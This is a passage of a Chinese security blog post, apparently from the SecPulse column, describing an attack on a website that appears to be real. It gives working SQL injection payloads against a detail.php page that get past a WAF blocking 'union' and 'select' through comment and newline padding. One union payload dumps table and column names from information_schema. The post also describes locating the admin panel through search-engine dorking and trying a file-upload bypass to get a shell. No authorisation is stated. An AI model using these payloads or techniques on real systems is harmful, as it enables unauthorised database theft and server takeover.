0x01 注入环节
/!order/ /!by/ 10-- -
经测试发现内联无法绕过union select,这个站强制拦截 union 和 select关键字
这里发现就算把union注释了也会被拦截
这个确实是比较麻烦,他强制拦截这两个关键字,给我们注入带来了非常多的麻烦,然后这里经过我的测试构造出了一种办法来绕过他这个WAF的限制
payload:
detail.php?asdasdasdasd/*&id=10' and mod (35,12) union &asdasdas=1*/
detail.php?asdasdasdasd/*&id=10' and mod (35,12) union%23aasadasdassdasdasdasdasdasdasdasdasdasdasdasaasadasdassdasdasdasdasdasdasdasdasdasdasdasaasadasdassdasdasdasdasdasdasdasdasdasdasdasaasadasdassdasdasdasdasdasdasdasdasdasdasdasaasadasdassdasdasdasdasdasdasdasdasdasdasdasaasadasdassdasdasdasdasdasdasdasdasdasdasdasaasadasdassdasdasdasdasdasdasdasdasdasdasdas%0aselect &asdasdas=1*/
detail.php?asdasdasdasd/*&id=.10' and mod (35,12) union%23aasadasdassdasdasdasdasdasdasdasdasdasdasdasaasadasdassdasdasdasdasdasdasdasdasdasdasdasaasadasdassdasdasdasdasdasdasdasdasdasdasdasaasadasdassdasdasdasdasdasdasdasdasdasdasdasaasadasdassdasdasdasdasdasdasdasdasdasdasdasaasadasdassdasdasdasdasdasdasdasdasdasdasdasaasadasdassdasdasdasdasdasdasdasdasdasdasdas%0aselect 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17-- -&asdasdas=1*/
OK,然后我们继续来操作 database() 获取当前数据库
detail.php?asdasdasdasd/*&id=.10' and mod (35,12) union%23aasadasdassdasdasdasdasdasdasdasdasdasdasdasaasadasdassdasdasdasdasdasdasdasdasdasdasdasaasadasdassdasdasdasdasdasdasdasdasdasdasdasaasadasdassdasdasdasdasdasdasdasdasdasdasdasaasadasdassdasdasdasdasdasdasdasdasdasdasdasaasadasdassdasdasdasdasdasdasdasdasdasdasdasaasadasdassdasdasdasdasdasdasdasdasdasdasdas%0aselect 1,2,3,4,5,concat((select @rui from(select (@rui:=0x00),(select @rui from information_schema.columns where table_schema=database() and @rui in(@rui:=concat(@rui,table_name,0x2d2d3e,column_name,0x3c62723e))))rui)),7,8,9,10,11,12,13,14,15,16,17-- -&asdasdas=1*/
已经找到了目标后台的账号密码表和列接下来直接注数据就行了
谷歌语法搜索发现目标管理后台,接下来我们进行登录尝试
0x02 拿shell环节
接下来我们寻找上传点拿下目标shell
这一处发现利用burp抓包修改jpg后辍能导致任意上传,下面我们来实战进行测试
上传成功后发现php里面的内容被强制转换成图片了,这里发现比较鸡肋就没有跟深一步研究,然后开始重新找其他上传点
本文作者:潇湘信安
本文为安全脉搏专栏作者发布,转载请注明:https://www.secpulse.com/archives/187347.html